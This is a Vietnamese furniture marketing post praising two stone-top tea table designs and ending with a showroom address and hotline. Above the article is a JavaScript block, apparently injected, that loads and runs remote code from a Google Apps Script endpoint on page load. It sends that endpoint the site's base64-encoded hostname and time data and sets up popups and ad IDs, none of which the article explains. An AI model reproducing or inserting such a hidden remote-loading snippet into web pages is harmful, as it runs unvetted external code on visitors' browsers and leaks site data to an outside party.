var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

2 mẫu bàn trà mặt đá được yêu thích nhất

Bàn trà mặt đá là hiện là sự lựa chọn của nhiều gia đình bởi chúng mang đến không gian sang trọng và đẳng cấp. Các mẫu bàn trà này hiện khá đa dạng về mẫu mã cho khách hàng lựa chọn. Cùng điểm danh 2 mẫu bàn trà mặt đá được yêu thích nhất qua bài viết dưới đây nhé.

Mẫu bàn trà mặt đá hình chữ nhật

Trong số các mẫu bàn trà mặt đá hiện nay thì bàn trà hình chữ nhật là sự lựa chọn hàng đầu của các khách hàng hiện nay. Bản thân các mẫu bàn trà hình chữ nhật với kiểu dáng truyền thống có thể phù hợp với nhiều không gian. Khi kết hợp cùng với bàn trà mặt đá sẽ giúp mang đến không gian sang trọng cho căn phòng của gia đình mình.

mẫu bàn trà mặt đá

Bàn trà mặt đá hình chữ nhật được yêu thích


Với các mẫu bàn trà sofa này các bạn có thể dễ dàng kết hợp cùng với các đồ nội thất khác. Bạn có thể kết hợp cùng bất kỳ bộ sofa, kệ tivi hay thảm trang trí nào để có không gian đẹp. Đây cũng là kiểu dáng các bạn không cần lo lắng vì chúng không bao giờ bị lỗi mốt.

Mẫu bàn trà mặt đá hình học

Trong xu hướng bàn trà hiện nay các mẫu bàn trà hình học được nhiều khách hàng yêu thích. Bởi chúng giúp mang đến không gian hiện đại cũng như ấn tượng riêng biệt cho phòng khách. Với mẫu bàn trà mặt đá này các bạn sẽ có được không gian sang trọng nhưng cũng không kém phần thu hút.

mẫu bàn trà mặt đá

Mẫu bàn trà mặt đá hình học được yêu thích


Với các mẫu bàn trà sofa này cũng rất đa dạng nên giúp mang đến nhiều sự lựa chọn cho các khách hàng. Bạn có thể chọn các kiểu dáng khác nhau theo sở thích cũng như đặc điểm không gian sống của gia đình mình.

Để được tư vấn cụ thể đến ngay showroom của chúng tôi tại số 321 Trường Chinh – Thanh Xuân hoặc liên hệ hotline 0975.90.3333 để được tư vấn cụ thể nhé.

>>>Xem thêm: Xu hướng lựa chọn chất liệu bàn trà sofa hiện đại